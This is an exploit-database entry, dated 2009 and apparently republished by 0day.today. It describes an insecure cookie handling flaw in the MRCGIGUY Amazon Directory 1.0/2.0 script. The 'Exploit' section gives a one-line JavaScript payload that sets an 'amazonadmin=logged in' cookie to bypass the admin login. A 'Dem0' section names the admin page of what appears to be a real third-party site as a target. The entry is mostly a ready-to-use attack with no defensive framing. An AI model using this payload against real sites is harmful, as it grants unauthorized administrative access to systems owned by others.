id: 5168
date: 05/13/2009
title: MRCGIGUY Amazon Directory 1.0/2.0 Insecure Cookie Handling Vuln
author: TiGeR-Dz
cves: 

===============================================================
MRCGIGUY Amazon Directory 1.0/2.0 Insecure Cookie Handling Vuln
===============================================================


---------------------------------------------------------------
Amazon Directory Version 1.0/2.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:Amazon Directory Version 1.0/2.0
Download:http://www.mrcgiguy.com/amazon_directory.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="amazonadmin=logged%20in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.myhotlinks.net/cgi-bin/amazon2/admin.cgi
--------------------------------------



#  0day.today [2023-03-27]  #